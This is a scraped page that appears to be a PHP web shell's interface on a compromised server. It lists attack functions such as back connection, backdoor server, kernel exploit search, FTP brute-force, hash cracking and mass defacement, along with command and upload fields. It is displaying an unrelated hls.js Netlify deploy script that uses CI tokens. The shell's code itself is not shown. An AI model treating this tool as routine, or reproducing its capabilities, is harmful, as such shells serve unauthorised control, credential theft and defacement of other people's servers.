IP Address: 80.252.133.24:443 You: 216.73.216.193
| |||||||||||||||||||
|
| ||||||||||||||||||
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON | |||||||||||||||||||
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, | |||||||||||||||||||
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ] |
|||||||||||||||||||
| |||||||||||||||||||
/ http/ root/ hls/ scripts/ - drwxr-xr-x |
Viewing file:
Select action/file-type: #!/bin/bash set -e # GITHUB_TOKEN and NETLIFY_ACCESS_TOKEN set in travis # ensure we have fetched origin/master git remote set-branches origin master git fetch currentCommit=$(git rev-parse HEAD) masterLatestCommit=$(git rev-parse origin/master) id=$currentCommit root="./netlify" version=$(jq -r -e '.version' "./package.json") idShort="$(echo "$id" | cut -c 1-8) ($version)" stableSiteId="deef7ecf-4c3e-4de0-b6bb-676b02e1c20e" deploy () { siteId=$1 echo "Deploying netlify to '$siteId'." ./node_modules/.bin/netlify deploy -d "$root" -m "deploy for $id" -s "$siteId" --prod -a "$NETLIFY_ACCESS_TOKEN" echo "Deployed netlify to '$siteId'." } echo "Creating site for current commit ($id)." uuid=$(uuidgen) commitSiteName="hls-js-$uuid" commitSiteId=$(curl --fail -d "{\"name\":\"$commitSiteName\"}" -H "Content-Type: application/json" -X POST "https://api.netlify.com/api/v1/hls-js/sites?access_token=$NETLIFY_ACCESS_TOKEN" | jq -r '.site_id') echo "Created site '$commitSiteId'." deploy "$commitSiteId" if [[ $version != *"-"* ]]; then echo "Detected new version: $version" deploy "$stableSiteId" fi echo "Finished deploying to netlify." echo "Updating deployments branch." git clone --depth 1 "https://${GITHUB_TOKEN}@github.com/video-dev/hls.js.git" -b deployments "$root/deployments" cd "$root/deployments" echo "- [\`$idShort\`](https://github.com/video-dev/hls.js/commit/$id): [https://$commitSiteName.netlify.app/](https://$commitSiteName.netlify.app/)" >> "README.md" git add "README.md" git -c user.name="HLS.JS CI" commit -m "update for $id" git push "https://${GITHUB_TOKEN}@github.com/video-dev/hls.js.git" cd .. echo "Updated deployments branch." |
Command: | |
Quick Commands: | |
Upload: | |
PHP Filesystem: |
<@ Ú |
Search File: | |
Create File: | |
View File: | |
Mass Defacement: |